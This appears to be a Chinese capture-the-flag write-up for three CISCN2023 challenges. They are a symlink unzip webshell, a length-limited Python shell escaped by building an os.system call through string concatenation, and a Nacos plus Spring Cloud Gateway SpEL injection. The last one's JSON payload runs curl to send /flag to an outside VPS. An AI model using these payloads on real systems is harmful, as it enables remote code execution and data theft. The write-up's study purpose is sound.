CISCN2023
2023-05-28 23:41:08

unzip

软链接 通过var/www/html包含马

image-20230529000548874

image-20230529000609504

并通过var目录将马放入

依次上传

读取flag

image-20230529000624465

flag{7349cbbd-20da-4b3e-8bd9-36084dac7053}

pyshell

Python的shell

导入os库查看flag

但是被ban了

发现open和eval还在

image-20230529000654365

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
但是还ban
猜测可能是对长度有限制

Welcome to this python shell,try to find the flag!
>>'__imp'
'__imp'
>>_+'ort'
'__import'
>>_+'__('
'__import__('
>>_+"'os"
"__import__('os"
>>v
Traceback (most recent call last):
File "<stdin>", line 1, in <module>
NameError: name 'v' is not defined
>>_+"')."
"__import__('os')."
>>_+"sys"
"__import__('os').sys"
>>_+"tem"
"__import__('os').system"
>>_+"('c"
"__import__('os').system('c"
>>_+"at "
"__import__('os').system('cat "
>>_+"/fl"
"__import__('os').system('cat /fl"
>>_+"ag'"
"__import__('os').system('cat /flag'"
>>_+")"
"__import__('os').system('cat /flag')"
>>eval(_)
flag{5dd8032d-4dbf-40c2-9ef9-c86386511c7a}0

image-20230529000712501

flag{5dd8032d-4dbf-40c2-9ef9-c86386511c7a}

BackendService

登录框

image-20230529000730982

尝试爆破无果

查找默认密码也不行

未授权绕过

image-20230529000739556

aa/aa

进行登录

新建配置

image-20230529000750982

题目外网IP和内网的端口

监听到内网机器

image-20230529000758891

根据文章

Nacos结合Spring Cloud Gateway RCE利用 - 先知社区 (aliyun.com)

写poc

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
{
"spring": {
"cloud": {
"gateway": {
"routes": [
{
"id": "exam",
"order": 0,
"uri": "lb://service-provider",
"predicates": [
"Path=/echo/**"
],
"filters": [
{
"name": "AddResponseHeader",
"args": {
"name": "result",
"value": "#{new java.lang.String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{'curl','vps:5678','-d','@/flag'}).getInputStream())).replaceAll('\\n','').replaceAll('\\r','')}"
}
}
]
}
]
}
}
}
}

image-20230529000829618

flag{e1667a09-38d6-4eb8-b38d-20de0f9269a4}

Prev
2023-05-28 23:41:08
Next